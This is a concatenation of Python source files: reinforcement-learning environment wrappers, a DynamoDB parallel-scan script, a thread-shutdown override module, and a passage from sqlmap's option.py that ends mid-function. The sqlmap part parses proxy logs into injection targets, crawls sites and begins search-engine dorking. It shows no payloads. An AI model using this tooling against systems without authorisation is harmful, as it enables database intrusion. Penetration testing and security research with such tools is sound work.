        results = [env.step(a) for a, env in zip(action_n, self.envs)]
        obs, rews, dones, infos = map(np.array, zip(*results))
        return np.array(obs), np.array(rews), np.array(dones), infos

    def reset(self):
        return np.array([env.reset() for env in self.envs])

    def render(self):
        return self.envs[0].render()

    @property
    def num_envs(self):
        return len(self.envs)
class VecNormalize(VecEnv):
    """
    Vectorized environment wrapper that normalizes observations and scales
    rewards by a running estimate of the discounted return's std.

    Args:
        venv: vectorized environment to wrap.
        ob (bool): normalize observations with running mean/std.
        ret (bool): scale rewards by the running std of the discounted return.
        clipob (float): clip normalized observations to [-clipob, clipob].
        cliprew (float): clip scaled rewards to [-cliprew, cliprew].
        gamma (float): discount factor for the running return estimate.
        epsilon (float): numerical stabilizer inside the sqrt.
    """
    def __init__(self, venv, ob=True, ret=True, clipob=10., cliprew=10., gamma=0.99, epsilon=1e-8):
        self.venv = venv
        self._observation_space = self.venv.observation_space
        self._action_space = venv.action_space
        self.ob_rms = RunningMeanStd(shape=self._observation_space.shape) if ob else None
        self.ret_rms = RunningMeanStd(shape=()) if ret else None
        self.clipob = clipob
        self.cliprew = cliprew
        self.ret = np.zeros(self.num_envs)  # running discounted return per env
        self.gamma = gamma
        self.epsilon = epsilon
    def step(self, vac):
        """
        Apply sequence of actions to sequence of environments
        actions -> (observations, rewards, news)
        where 'news' is a boolean vector indicating whether each element is new.
        """
        obs, rews, news, infos = self.venv.step(vac)
        self.ret = self.ret * self.gamma + rews
        obs = self._obfilt(obs)
        if self.ret_rms:
            self.ret_rms.update(self.ret)
            rews = np.clip(rews / np.sqrt(self.ret_rms.var + self.epsilon), -self.cliprew, self.cliprew)
        # Bug fix: restart the discounted-return accumulator for envs whose
        # episode just ended; otherwise returns from different episodes leak
        # into each other and corrupt ret_rms.
        self.ret[np.asarray(news, dtype=bool)] = 0.
        return obs, rews, news, infos
    def _obfilt(self, obs):
        # Standardize (and clip) observations with the running statistics.
        if self.ob_rms:
            self.ob_rms.update(obs)
            obs = np.clip((obs - self.ob_rms.mean) / np.sqrt(self.ob_rms.var + self.epsilon), -self.clipob, self.clipob)
            return obs
        else:
            return obs
    def reset(self):
        """
        Reset all environments
        """
        # Bug fix: a full reset starts fresh episodes everywhere, so the
        # running returns must be zeroed as well.
        self.ret = np.zeros(self.num_envs)
        obs = self.venv.reset()
        return self._obfilt(obs)
    @property
    def action_space(self):
        return self._action_space
    @property
    def observation_space(self):
        return self._observation_space
    def close(self):
        self.venv.close()
    @property
    def num_envs(self):
        return self.venv.num_envs
class VecNormalizeTest(VecEnv):
    """Evaluation-time observation normalizer: standardizes observations with
    FIXED (pre-computed) mean/var instead of running statistics."""
    def __init__(self, venv, mean, var, clipob=10., epsilon=1e-8):
        self.venv = venv
        self._observation_space = self.venv.observation_space
        self._action_space = venv.action_space
        self.mean = mean
        self.var = var
        self.clipob = clipob
        self.epsilon = epsilon
    def render(self):
        return self.venv.render()
    def step(self, vac):
        obs, rews, dones, infos = self.venv.step(vac)
        return self._obfilt(obs), rews, dones, infos
    def _obfilt(self, obs):
        # Standardize with the frozen statistics, then clip outliers.
        centered = (obs - self.mean) / np.sqrt(self.var + self.epsilon)
        return np.clip(centered, -self.clipob, self.clipob)
    def reset(self):
        return self._obfilt(self.venv.reset())
    @property
    def action_space(self):
        return self._action_space
    @property
    def observation_space(self):
        return self._observation_space
    def close(self):
        self.venv.close()
    @property
    def num_envs(self):
        return self.venv.num_envs
def worker(remote, parent_remote, env_fn_wrapper):
    """Subprocess loop: build the env, then serve commands arriving on the pipe
    until a 'close' command is received."""
    parent_remote.close()  # the child only talks through its own pipe end
    env = env_fn_wrapper.x()
    while True:
        cmd, data = remote.recv()
        if cmd == 'step':
            ob, reward, done, info = env.step(data)
            if done:
                # Auto-reset so the parent always receives a live observation.
                ob = env.reset()
            remote.send((ob, reward, done, info))
        elif cmd == 'reset':
            remote.send(env.reset())
        elif cmd == 'reset_task':
            remote.send(env.reset_task())
        elif cmd == 'close':
            remote.close()
            break
        elif cmd == 'get_spaces':
            remote.send((env.action_space, env.observation_space))
        else:
            raise NotImplementedError
class CloudpickleWrapper(object):
    """Pickle-compatible carrier that serializes its payload with cloudpickle
    (otherwise multiprocessing would try plain pickle on it)."""
    def __init__(self, x):
        self.x = x
    def __getstate__(self):
        import cloudpickle
        blob = cloudpickle.dumps(self.x)
        return blob
    def __setstate__(self, ob):
        import pickle
        payload = pickle.loads(ob)
        self.x = payload
class SubprocVecEnv(VecEnv):
    """
    Runs each environment in its own subprocess and steps them in parallel.

    envs: list of gym environment thunks to run in subprocesses
    """
    def __init__(self, env_fns):
        self.closed = False
        pipe_pairs = [Pipe() for _ in range(len(env_fns))]
        self.remotes = tuple(pair[0] for pair in pipe_pairs)
        self.work_remotes = tuple(pair[1] for pair in pipe_pairs)
        self.ps = []
        for work_remote, remote, env_fn in zip(self.work_remotes, self.remotes, env_fns):
            proc = Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn)))
            proc.daemon = True  # if the main process crashes, we should not cause things to hang
            proc.start()
            self.ps.append(proc)
        for work_remote in self.work_remotes:
            work_remote.close()  # only the children use these ends now
        self.remotes[0].send(('get_spaces', None))
        self.action_space, self.observation_space = self.remotes[0].recv()
    def step(self, actions):
        for remote, action in zip(self.remotes, actions):
            remote.send(('step', action))
        replies = [remote.recv() for remote in self.remotes]
        obs, rews, dones, infos = zip(*replies)
        return np.stack(obs), np.stack(rews), np.stack(dones), infos
    def reset(self):
        for remote in self.remotes:
            remote.send(('reset', None))
        return np.stack([remote.recv() for remote in self.remotes])
    def reset_task(self):
        for remote in self.remotes:
            remote.send(('reset_task', None))
        return np.stack([remote.recv() for remote in self.remotes])
    def close(self):
        if self.closed:
            return
        for remote in self.remotes:
            remote.send(('close', None))
        for proc in self.ps:
            proc.join()
        self.closed = True
    @property
    def num_envs(self):
        return len(self.remotes)
class RunningMeanStd(object):
    # https://en.wikipedia.org/wiki/Algorithms_for_calculating_variance#Parallel_algorithm
    def __init__(self, epsilon=1e-4, shape=()):
        """Track a running mean/variance over batches of samples."""
        self.mean = np.zeros(shape, 'float64')
        self.var = np.zeros(shape, 'float64')
        self.count = epsilon  # tiny prior mass avoids division by zero
    def update(self, x):
        """Fold one batch (stacked along axis 0) into the running statistics."""
        self._merge(np.mean(x, axis=0), np.var(x, axis=0), x.shape[0])
    def _merge(self, batch_mean, batch_var, batch_count):
        # Chan et al. parallel merge of two (mean, var, count) summaries.
        delta = batch_mean - self.mean
        total = self.count + batch_count
        merged_mean = self.mean + delta * batch_count / total
        m_a = self.var * self.count
        m_b = batch_var * batch_count
        m2 = m_a + m_b + np.square(delta) * self.count * batch_count / total
        self.mean = merged_mean
        self.var = m2 / total
        self.count = total
class Monitor(Wrapper):
    # Gym env wrapper that records per-episode reward, length and wall time,
    # and optionally appends one CSV row per finished episode to a
    # "<name>.monitor.csv" file.
    # NOTE(review): implements the old-style gym hooks (_reset/_step) - confirm
    # the installed gym version still dispatches to these names.
    EXT = "monitor.csv"
    f = None
    def __init__(self, env, filename, allow_early_resets=False, reset_keywords=()):
        Wrapper.__init__(self, env=env)
        self.tstart = time.time()
        if filename is None:
            # No file output; only the in-memory episode statistics are kept.
            self.f = None
            self.logger = None
        else:
            if not filename.endswith(Monitor.EXT):
                if osp.isdir(filename):
                    filename = osp.join(filename, Monitor.EXT)
                else:
                    filename = filename + "." + Monitor.EXT
            self.f = open(filename, "wt")
            # First line is a '#'-prefixed JSON header (start time, gym version, env id).
            self.f.write('#%s\n'%json.dumps({"t_start": self.tstart, "gym_version": gym.__version__,
                "env_id": env.spec.id if env.spec else 'Unknown'}))
            self.logger = csv.DictWriter(self.f, fieldnames=('r', 'l', 't')+reset_keywords)
            self.logger.writeheader()
        self.reset_keywords = reset_keywords
        self.allow_early_resets = allow_early_resets
        self.rewards = None
        self.needs_reset = True
        self.episode_rewards = []
        self.episode_lengths = []
        self.total_steps = 0
        self.current_reset_info = {} # extra info about the current episode, that was passed in during reset()
    def _reset(self, **kwargs):
        # Refuse to reset mid-episode unless explicitly allowed.
        if not self.allow_early_resets and not self.needs_reset:
            raise RuntimeError("Tried to reset an environment before done. If you want to allow early resets, wrap your env with Monitor(env, path, allow_early_resets=True)")
        self.rewards = []
        self.needs_reset = False
        # Every declared reset keyword must be supplied; its value is logged
        # with the episode row.
        for k in self.reset_keywords:
            v = kwargs.get(k)
            if v is None:
                raise ValueError('Expected you to pass kwarg %s into reset'%k)
            self.current_reset_info[k] = v
        return self.env.reset(**kwargs)
    def _step(self, action):
        if self.needs_reset:
            raise RuntimeError("Tried to step environment that needs reset")
        ob, rew, done, info = self.env.step(action)
        self.rewards.append(rew)
        if done:
            self.needs_reset = True
            eprew = sum(self.rewards)
            eplen = len(self.rewards)
            # r/l/t values are rounded for compact CSV output.
            epinfo = {"r": round(eprew, 6), "l": eplen, "t": round(time.time() - self.tstart, 6)}
            epinfo.update(self.current_reset_info)
            if self.logger:
                self.logger.writerow(epinfo)
                self.f.flush()
            self.episode_rewards.append(eprew)
            self.episode_lengths.append(eplen)
            info['episode'] = epinfo
        self.total_steps += 1
        return (ob, rew, done, info)
    def close(self):
        # Close the CSV file handle if one was opened.
        if self.f is not None:
            self.f.close()
    def get_total_steps(self):
        return self.total_steps
    def get_episode_rewards(self):
        return self.episode_rewards
    def get_episode_lengths(self):
        return self.episode_lengths
scan_parallel.py | from __future__ import print_function # Python 2/3 compatibility
import time, sys, boto3, threading
from botocore.exceptions import ClientError
# Create Client
session = boto3.session.Session(region_name="eu-west-1")
dynamoDbClient = session.client('dynamodb')
def scan_table(segment, total_segments):
    """Scan one parallel segment of the DynamoDB table, paging until exhausted.

    Relies on the module-level ``table_name`` and ``dynamoDbClient``.
    """
    print('Starting Segment ' + str(segment))
    try:
        scan_kwargs = dict(
            TableName=table_name,
            Segment=segment,
            TotalSegments=total_segments,
        )
        response = dynamoDbClient.scan(**scan_kwargs)
        # Each Scan call returns at most 1 MB; follow LastEvaluatedKey to page
        # through the rest of this segment.
        while 'LastEvaluatedKey' in response:
            response = dynamoDbClient.scan(
                ExclusiveStartKey=response['LastEvaluatedKey'], **scan_kwargs)
    except ClientError as error:
        print("Something went wrong: ")
        print(error.response['ResponseMetadata'])
def create_threads():
    """Spawn one scanner thread per segment and block until all finish.

    Relies on the module-level ``threads`` count and ``scan_table``.
    """
    workers = [
        threading.Thread(target=scan_table, args=(i, threads))
        for i in range(threads)
    ]
    for worker_thread in workers:
        worker_thread.start()
    # Block the main thread until every scanner is done.
    for worker_thread in workers:
        worker_thread.join()
# Entry point: time a full parallel scan of the table.
if __name__ == "__main__":
    table_name = "AmazonBins"
    threads = 10  # number of parallel scan segments
    started = time.time()
    create_threads()
    finished = time.time()
    # Report total wall-clock time of the parallel scan.
    print(finished - started)
|
fix_threading_shutdown.py | """
threading._shutdown changed. It used to call "join" on every non-daemon Thread. This kind of kills the purpose for
this library. This library was created to automatically join and safely clean up long running threads. This module
changes "_shutdown" to "join" all non-daemon Threads again.
"""
import threading
__all__ = ['shutdown', 'get_shutdown_timeout', 'set_shutdown_timeout', 'get_allow_shutdown', 'set_allow_shutdown',
'threading_shutdown', 'custom_shutdown', 'using_custom_shutdown', 'set_shutdown', 'reset_shutdown']
SHUTDOWN_TIMEOUT = 1
ALLOW_SHUTDOWN = False
def get_shutdown_timeout():
    """Return the shutdown timeout (seconds passed to each Thread.join)."""
    # Idiom fix: reading a module-level name needs no ``global`` declaration.
    return SHUTDOWN_TIMEOUT
def set_shutdown_timeout(value):
    """Set the shutdown timeout value (int/float seconds passed to Thread.join)."""
    global SHUTDOWN_TIMEOUT
    SHUTDOWN_TIMEOUT = value
def get_allow_shutdown():
    """Return whether "shutdown" automatically calls each thread's allow_shutdown."""
    # Idiom fix: reading a module-level name needs no ``global`` declaration.
    return ALLOW_SHUTDOWN
def set_allow_shutdown(value):
    """Set (bool) whether "shutdown" automatically calls each thread's allow_shutdown."""
    global ALLOW_SHUTDOWN
    ALLOW_SHUTDOWN = value
def shutdown(timeout=None, allow_shutdown=True):
    """Join and allow all threads to shutdown.

    Python's threading._shutdown may hang preventing the process from exiting completely. It uses the "_tstate_lock"
    to wait for every thread to "join". Python's threading._shutdown used to call join to achieve the same behavior.
    This library overrides threading._shutdown to "join" all Threads before the process ends.
    You may want to put this at the end of your code. Atexit will not work for this.

    Args:
        timeout (int/float)[None]: Timeout argument to pass into every thread's join method.
        allow_shutdown (bool)[True]: If True also call allow_shutdown() on each thread.
            Pass None explicitly to fall back to the module-wide setting (set_allow_shutdown).
    """
    if allow_shutdown is None:
        allow_shutdown = get_allow_shutdown()
    main = threading.main_thread()  # hoisted: the main thread never changes mid-loop
    for th in threading.enumerate():
        # Join every other live, non-daemon thread.
        try:
            # Fix: th.daemon replaces the deprecated camelCase isDaemon() accessor.
            if th is not main and th.is_alive() and not th.daemon:
                th.join(timeout)
        except Exception as err:
            # Fix: the old (AttributeError, ValueError, TypeError, Exception)
            # tuple was redundant - Exception already covers them all.
            print(err)
        # Allow threading._shutdown() to continue; best-effort because only
        # this library's threads implement allow_shutdown().
        if allow_shutdown:
            try:
                th.allow_shutdown()
            except Exception:
                pass
# Save the original threading._shutdown function so custom_shutdown can chain
# to it and reset_shutdown can restore it.
threading_shutdown = threading._shutdown
def custom_shutdown():
    """Safely join/allow all threads, then run Python's original shutdown."""
    join_timeout = get_shutdown_timeout()
    call_allow = get_allow_shutdown()
    shutdown(join_timeout, call_allow)
    threading_shutdown()
def using_custom_shutdown():
    """Return True if threading._shutdown has been replaced with a custom function."""
    return not (threading._shutdown == threading_shutdown)
def set_shutdown(func=None):
    """Install ``func`` (default: custom_shutdown) as threading._shutdown so
    non-daemon threads are joined before the interpreter exits."""
    threading._shutdown = custom_shutdown if func is None else func
def reset_shutdown():
    """Reset the threading._shutdown function to use its original function."""
    # threading_shutdown holds the interpreter's original _shutdown, saved at import time.
    threading._shutdown = threading_shutdown
# Change threading._shutdown to use our custom function (installed at import
# time so threads created later are still joined on interpreter exit).
set_shutdown()
|
option.py | #!/usr/bin/env python
"""
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import binascii
import cookielib
import glob
import inspect
import logging
import httplib
import os
import random
import re
import socket
import string
import sys
import tempfile
import threading
import time
import urllib2
import urlparse
import lib.controller.checks
import lib.core.common
import lib.core.threads
import lib.core.convert
import lib.request.connect
import lib.utils.search
from lib.controller.checks import checkConnection
from lib.core.common import Backend
from lib.core.common import boldifyMessage
from lib.core.common import checkFile
from lib.core.common import dataToStdout
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSafeExString
from lib.core.common import extractRegexResult
from lib.core.common import filterStringValue
from lib.core.common import findLocalPort
from lib.core.common import findPageForms
from lib.core.common import getConsoleWidth
from lib.core.common import getFileItems
from lib.core.common import getFileType
from lib.core.common import getUnicode
from lib.core.common import normalizePath
from lib.core.common import ntToPosixSlashes
from lib.core.common import openFile
from lib.core.common import parseTargetDirect
from lib.core.common import parseTargetUrl
from lib.core.common import paths
from lib.core.common import randomStr
from lib.core.common import readCachedFileContent
from lib.core.common import readInput
from lib.core.common import resetCookieJar
from lib.core.common import runningAsAdmin
from lib.core.common import safeExpandUser
from lib.core.common import saveConfig
from lib.core.common import setOptimize
from lib.core.common import setPaths
from lib.core.common import singleTimeWarnMessage
from lib.core.common import urldecode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import mergedOptions
from lib.core.data import queries
from lib.core.datatype import AttribDict
from lib.core.datatype import InjectionDict
from lib.core.defaults import defaults
from lib.core.dicts import DBMS_DICT
from lib.core.dicts import DUMP_REPLACEMENTS
from lib.core.enums import ADJUST_TIME_DELAY
from lib.core.enums import AUTH_TYPE
from lib.core.enums import CUSTOM_LOGGING
from lib.core.enums import DUMP_FORMAT
from lib.core.enums import HTTP_HEADER
from lib.core.enums import HTTPMETHOD
from lib.core.enums import MOBILES
from lib.core.enums import OPTION_TYPE
from lib.core.enums import PAYLOAD
from lib.core.enums import PRIORITY
from lib.core.enums import PROXY_TYPE
from lib.core.enums import REFLECTIVE_COUNTER
from lib.core.enums import WIZARD
from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapFilePathException
from lib.core.exception import SqlmapGenericException
from lib.core.exception import SqlmapInstallationException
from lib.core.exception import SqlmapMissingDependence
from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import SqlmapMissingPrivileges
from lib.core.exception import SqlmapNoneDataException
from lib.core.exception import SqlmapSilentQuitException
from lib.core.exception import SqlmapSyntaxException
from lib.core.exception import SqlmapSystemException
from lib.core.exception import SqlmapUnsupportedDBMSException
from lib.core.exception import SqlmapUserQuitException
from lib.core.log import FORMATTER
from lib.core.optiondict import optDict
from lib.core.settings import BURP_REQUEST_REGEX
from lib.core.settings import BURP_XML_HISTORY_REGEX
from lib.core.settings import CODECS_LIST_PAGE
from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS
from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR
from lib.core.settings import DBMS_ALIASES
from lib.core.settings import DEFAULT_PAGE_ENCODING
from lib.core.settings import DEFAULT_TOR_HTTP_PORTS
from lib.core.settings import DEFAULT_TOR_SOCKS_PORTS
from lib.core.settings import DUMMY_URL
from lib.core.settings import INJECT_HERE_MARK
from lib.core.settings import IS_WIN
from lib.core.settings import KB_CHARS_BOUNDARY_CHAR
from lib.core.settings import KB_CHARS_LOW_FREQUENCY_ALPHABET
from lib.core.settings import LOCALHOST
from lib.core.settings import MAX_CONNECT_RETRIES
from lib.core.settings import MAX_NUMBER_OF_THREADS
from lib.core.settings import NULL
from lib.core.settings import PARAMETER_SPLITTING_REGEX
from lib.core.settings import PRECONNECT_CANDIDATE_TIMEOUT
from lib.core.settings import PROBLEMATIC_CUSTOM_INJECTION_PATTERNS
from lib.core.settings import SITE
from lib.core.settings import SOCKET_PRE_CONNECT_QUEUE_SIZE
from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX
from lib.core.settings import SUPPORTED_DBMS
from lib.core.settings import SUPPORTED_OS
from lib.core.settings import TIME_DELAY_CANDIDATES
from lib.core.settings import UNICODE_ENCODING
from lib.core.settings import UNION_CHAR_REGEX
from lib.core.settings import UNKNOWN_DBMS_VERSION
from lib.core.settings import URI_INJECTABLE_REGEX
from lib.core.settings import VERSION_STRING
from lib.core.settings import WEBSCARAB_SPLITTER
from lib.core.threads import getCurrentThreadData
from lib.core.threads import setDaemon
from lib.core.update import update
from lib.parse.configfile import configFileParser
from lib.parse.payloads import loadBoundaries
from lib.parse.payloads import loadPayloads
from lib.parse.sitemap import parseSitemap
from lib.request.basic import checkCharEncoding
from lib.request.connect import Connect as Request
from lib.request.dns import DNSServer
from lib.request.basicauthhandler import SmartHTTPBasicAuthHandler
from lib.request.httpshandler import HTTPSHandler
from lib.request.pkihandler import HTTPSPKIAuthHandler
from lib.request.rangehandler import HTTPRangeHandler
from lib.request.redirecthandler import SmartRedirectHandler
from lib.request.templates import getPageTemplate
from lib.utils.crawler import crawl
from lib.utils.deps import checkDependencies
from lib.utils.search import search
from lib.utils.purge import purge
from thirdparty.keepalive import keepalive
from thirdparty.multipart import multipartpost
from thirdparty.oset.pyoset import oset
from thirdparty.socks import socks
from xml.etree.ElementTree import ElementTree
# Module-level urllib2 opener handlers shared by the option-setup helpers.
authHandler = urllib2.BaseHandler()
httpsHandler = HTTPSHandler()
keepAliveHandler = keepalive.HTTPHandler()
proxyHandler = urllib2.ProxyHandler()
redirectHandler = SmartRedirectHandler()
rangeHandler = HTTPRangeHandler()
multipartPostHandler = multipartpost.MultipartPostHandler()
# Reference: https://mail.python.org/pipermail/python-list/2009-November/558615.html
try:
    WindowsError
except NameError:
    # Non-Windows platforms do not define WindowsError; provide a placeholder.
    WindowsError = None
def _feedTargetsDict(reqFile, addedTargetUrls):
    """
    Parses web scarab and burp logs and adds results to the target URL list
    """
    def _parseWebScarabLog(content):
        """
        Parses web scarab logs (POST method not supported)
        """
        reqResList = content.split(WEBSCARAB_SPLITTER)
        for request in reqResList:
            url = extractRegexResult(r"URL: (?P<result>.+?)\n", request, re.I)
            method = extractRegexResult(r"METHOD: (?P<result>.+?)\n", request, re.I)
            cookie = extractRegexResult(r"COOKIE: (?P<result>.+?)\n", request, re.I)
            if not method or not url:
                logger.debug("not a valid WebScarab log data")
                continue
            if method.upper() == HTTPMETHOD.POST:
                warnMsg = "POST requests from WebScarab logs aren't supported "
                warnMsg += "as their body content is stored in separate files. "
                warnMsg += "Nevertheless you can use -r to load them individually."
                logger.warning(warnMsg)
                continue
            # Honor --scope filtering and skip duplicate URLs
            if not(conf.scope and not re.search(conf.scope, url, re.I)):
                if not kb.targets or url not in addedTargetUrls:
                    kb.targets.add((url, method, None, cookie, None))
                    addedTargetUrls.add(url)
    def _parseBurpLog(content):
        """
        Parses burp logs
        """
        # Accept three shapes: a Burp request log, a Burp XML history export
        # (base64-encoded requests), or a single raw HTTP request.
        if not re.search(BURP_REQUEST_REGEX, content, re.I | re.S):
            if re.search(BURP_XML_HISTORY_REGEX, content, re.I | re.S):
                reqResList = []
                for match in re.finditer(BURP_XML_HISTORY_REGEX, content, re.I | re.S):
                    port, request = match.groups()
                    try:
                        request = request.decode("base64")
                    except binascii.Error:
                        continue
                    _ = re.search(r"%s:.+" % re.escape(HTTP_HEADER.HOST), request)
                    if _:
                        host = _.group(0).strip()
                        if not re.search(r":\d+\Z", host):
                            request = request.replace(host, "%s:%d" % (host, int(port)))
                    reqResList.append(request)
            else:
                reqResList = [content]
        else:
            reqResList = re.finditer(BURP_REQUEST_REGEX, content, re.I | re.S)
        for match in reqResList:
            request = match if isinstance(match, basestring) else match.group(0)
            request = re.sub(r"\A[^\w]+", "", request)
            schemePort = re.search(r"(http[\w]*)\:\/\/.*?\:([\d]+).+?={10,}", request, re.I | re.S)
            if schemePort:
                scheme = schemePort.group(1)
                port = schemePort.group(2)
                request = re.sub(r"\n=+\Z", "", request.split(schemePort.group(0))[-1].lstrip())
            else:
                scheme, port = None, None
            # Skip anything that is not an HTTP request line, and GETs for
            # crawl-excluded (static) file extensions
            if not re.search(r"^[\n]*(%s).*?\sHTTP\/" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), request, re.I | re.M):
                continue
            if re.search(r"^[\n]*%s.*?\.(%s)\sHTTP\/" % (HTTPMETHOD.GET, "|".join(CRAWL_EXCLUDE_EXTENSIONS)), request, re.I | re.M):
                continue
            getPostReq = False
            url = None
            host = None
            method = None
            data = None
            cookie = None
            params = False
            newline = None
            lines = request.split('\n')
            headers = []
            # Line-by-line state machine over the raw HTTP request
            for index in xrange(len(lines)):
                line = lines[index]
                if not line.strip() and index == len(lines) - 1:
                    break
                newline = "\r\n" if line.endswith('\r') else '\n'
                line = line.strip('\r')
                match = re.search(r"\A(%s) (.+) HTTP/[\d.]+\Z" % "|".join(getPublicTypeMembers(HTTPMETHOD, True)), line) if not method else None
                if len(line.strip()) == 0 and method and method != HTTPMETHOD.GET and data is None:
                    data = ""
                    params = True
                elif match:
                    method = match.group(1)
                    url = match.group(2)
                    if any(_ in line for _ in ('?', '=', CUSTOM_INJECTION_MARK_CHAR)):
                        params = True
                    getPostReq = True
                # POST parameters
                elif data is not None and params:
                    data += "%s%s" % (line, newline)
                # GET parameters
                elif "?" in line and "=" in line and ": " not in line:
                    params = True
                # Headers
                elif re.search(r"\A\S+:", line):
                    key, value = line.split(":", 1)
                    value = value.strip().replace("\r", "").replace("\n", "")
                    # Cookie and Host headers
                    if key.upper() == HTTP_HEADER.COOKIE.upper():
                        cookie = value
                    elif key.upper() == HTTP_HEADER.HOST.upper():
                        if '://' in value:
                            scheme, value = value.split('://')[:2]
                        splitValue = value.split(":")
                        host = splitValue[0]
                        if len(splitValue) > 1:
                            port = filterStringValue(splitValue[1], "[0-9]")
                    # Avoid to add a static content length header to
                    # headers and consider the following lines as
                    # POSTed data
                    if key.upper() == HTTP_HEADER.CONTENT_LENGTH.upper():
                        params = True
                    # Avoid proxy and connection type related headers
                    elif key not in (HTTP_HEADER.PROXY_CONNECTION, HTTP_HEADER.CONNECTION):
                        headers.append((getUnicode(key), getUnicode(value)))
                    if CUSTOM_INJECTION_MARK_CHAR in re.sub(PROBLEMATIC_CUSTOM_INJECTION_PATTERNS, "", value or ""):
                        params = True
            data = data.rstrip("\r\n") if data else data
            if getPostReq and (params or cookie):
                # Infer missing scheme/port pairs (https <-> 443) before
                # assembling the final absolute URL
                if not port and isinstance(scheme, basestring) and scheme.lower() == "https":
                    port = "443"
                elif not scheme and port == "443":
                    scheme = "https"
                if conf.forceSSL:
                    scheme = "https"
                    port = port or "443"
                if not host:
                    errMsg = "invalid format of a request file"
                    raise SqlmapSyntaxException, errMsg
                if not url.startswith("http"):
                    url = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url)
                    scheme = None
                    port = None
                if not(conf.scope and not re.search(conf.scope, url, re.I)):
                    if not kb.targets or url not in addedTargetUrls:
                        kb.targets.add((url, conf.method or method, data, cookie, tuple(headers)))
                        addedTargetUrls.add(url)
    # Main body: read the file once, then try both parsers against it
    checkFile(reqFile)
    try:
        with openFile(reqFile, "rb") as f:
            content = f.read()
    except (IOError, OSError, MemoryError), ex:
        errMsg = "something went wrong while trying "
        errMsg += "to read the content of file '%s' ('%s')" % (reqFile, getSafeExString(ex))
        raise SqlmapSystemException(errMsg)
    if conf.scope:
        logger.info("using regular expression '%s' for filtering targets" % conf.scope)
    _parseBurpLog(content)
    _parseWebScarabLog(content)
    if not addedTargetUrls:
        errMsg = "unable to find usable request(s) "
        errMsg += "in provided file ('%s')" % reqFile
        raise SqlmapGenericException(errMsg)
def _loadQueries():
    """
    Loads queries from 'xml/queries.xml' file.
    """
    # Recursively converts an XML node tree into lightweight attribute-access
    # objects: element attributes become instance attributes, child elements
    # become nested DictObject instances.
    def iterate(node, retVal=None):
        class DictObject(object):
            def __init__(self):
                self.__dict__ = {}
            def __contains__(self, name):
                return name in self.__dict__
        if retVal is None:
            retVal = DictObject()
        for child in node.findall("*"):
            instance = DictObject()
            retVal.__dict__[child.tag] = instance
            if child.attrib:
                instance.__dict__.update(child.attrib)
            else:
                iterate(child, instance)
        return retVal
    tree = ElementTree()
    try:
        tree.parse(paths.QUERIES_XML)
    except Exception, ex:
        errMsg = "something appears to be wrong with "
        errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, getSafeExString(ex))
        errMsg += "sure that you haven't made any changes to it"
        raise SqlmapInstallationException, errMsg
    # Top-level nodes are keyed by their DBMS 'value' attribute
    for node in tree.findall("*"):
        queries[node.attrib['value']] = iterate(node)
def _setMultipleTargets():
    """
    Define a configuration parameter if we are running in multiple target
    mode (parsing a targets list from a log file or a directory of requests).
    """
    initialTargetsCount = len(kb.targets)
    addedTargetUrls = set()
    if not conf.logFile:
        return
    debugMsg = "parsing targets list from '%s'" % conf.logFile
    logger.debug(debugMsg)
    if not os.path.exists(conf.logFile):
        errMsg = "the specified list of targets does not exist"
        raise SqlmapFilePathException(errMsg)
    if os.path.isfile(conf.logFile):
        _feedTargetsDict(conf.logFile, addedTargetUrls)
    elif os.path.isdir(conf.logFile):
        files = os.listdir(conf.logFile)
        files.sort()
        for reqFile in files:
            # Only "<number>-request" files are considered.
            # Fix: raw string replaces the invalid '\-' escape sequence
            # (matching behavior is unchanged).
            if not re.search(r"(\d+)-request", reqFile):
                continue
            _feedTargetsDict(os.path.join(conf.logFile, reqFile), addedTargetUrls)
    else:
        errMsg = "the specified list of targets is not a file "
        errMsg += "nor a directory"
        raise SqlmapFilePathException(errMsg)
    updatedTargetsCount = len(kb.targets)
    if updatedTargetsCount > initialTargetsCount:
        infoMsg = "sqlmap parsed %d " % (updatedTargetsCount - initialTargetsCount)
        infoMsg += "(parameter unique) requests from the "
        infoMsg += "targets list ready to be tested"
        logger.info(infoMsg)
def _adjustLoggingFormatter():
    """
    Solves problem of line deletion caused by overlapping logging messages
    and retrieved data info in inference mode
    """
    # Already patched (the original format method was stashed in _format)
    if hasattr(FORMATTER, '_format'):
        return
    def format(record):
        message = boldifyMessage(FORMATTER._format(record))
        if kb.get("prependFlag"):
            message = "\n%s" % message
            kb.prependFlag = False
        return message
    FORMATTER._format = FORMATTER.format
    FORMATTER.format = format
def _setRequestFromFile():
    """
    This function checks if the way to make a HTTP request is through supplied
    textual file, parses it and saves the information into the knowledge base.
    """
    if not conf.requestFile:
        return
    addedTargetUrls = set()
    conf.requestFile = safeExpandUser(conf.requestFile)
    if not os.path.isfile(conf.requestFile):
        raise SqlmapFilePathException("specified HTTP request file '%s' does not exist" % conf.requestFile)
    logger.info("parsing HTTP request from '%s'" % conf.requestFile)
    _feedTargetsDict(conf.requestFile, addedTargetUrls)
def _setCrawler():
    # Crawl the main target (or every bulk/sitemap target) for additional
    # links, up to conf.crawlDepth levels deep.
    if not conf.crawlDepth:
        return
    if not any((conf.bulkFile, conf.sitemapUrl)):
        crawl(conf.url)
    else:
        if conf.bulkFile:
            targets = getFileItems(conf.bulkFile)
        else:
            targets = parseSitemap(conf.sitemapUrl)
        for i in xrange(len(targets)):
            try:
                target = targets[i]
                crawl(target)
                if conf.verbose in (1, 2):
                    status = "%d/%d links visited (%d%%)" % (i + 1, len(targets), round(100.0 * (i + 1) / len(targets)))
                    dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True)
            except Exception, ex:
                # Best-effort: a failing target must not abort the whole crawl
                errMsg = "problem occurred while crawling at '%s' ('%s')" % (target, getSafeExString(ex))
                logger.error(errMsg)
def _doSearch():
    """
    This function performs search dorking, parses results
    and saves the testable hosts into the knowledge base.
    """
    if not conf.googleDork:
